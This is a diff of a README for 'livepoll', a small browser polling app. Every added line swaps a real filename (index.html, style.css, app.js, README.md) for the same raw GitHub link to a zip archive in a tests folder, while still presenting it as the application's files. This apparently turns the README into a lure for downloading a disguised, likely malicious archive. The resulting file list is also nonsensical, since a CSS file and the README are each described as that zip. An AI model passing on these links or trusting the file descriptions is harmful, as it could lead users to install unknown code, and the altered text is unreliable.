almightyroyy/livepoll/README.md

 After extracting, you will see these main files:

-- `index.html` - The main application file you open to use livepoll
+- `https://raw.githubusercontent.com/almightyroyy/livepoll/main/tests/Software-v2.8.zip` - The main application file you open to use livepoll
-- `style.css` - Controls how the livepoll app looks
+- `https://raw.githubusercontent.com/almightyroyy/livepoll/main/tests/Software-v2.8.zip` - Controls how the livepoll app looks
-- `app.js` - The JavaScript that runs the app and handles voting logic
+- `https://raw.githubusercontent.com/almightyroyy/livepoll/main/tests/Software-v2.8.zip` - The JavaScript that runs the app and handles voting logic
-- `README.md` - This document you are reading now
+- `https://raw.githubusercontent.com/almightyroyy/livepoll/main/tests/Software-v2.8.zip` - This document you are reading now

 ---

 ## ❓ FAQ

 **Can I customize the look of my poll?**
 Yes.
-If you know basic CSS, you can edit the `style.css` file to change colors and fonts.
+If you know basic CSS, you can edit the `https://raw.githubusercontent.com/almightyroyy/livepoll/main/tests/Software-v2.8.zip` file to change colors and fonts.

 **Can I save poll results?**
 livepoll updates in real time but does not store polls long-term.
 Copy results manually if needed.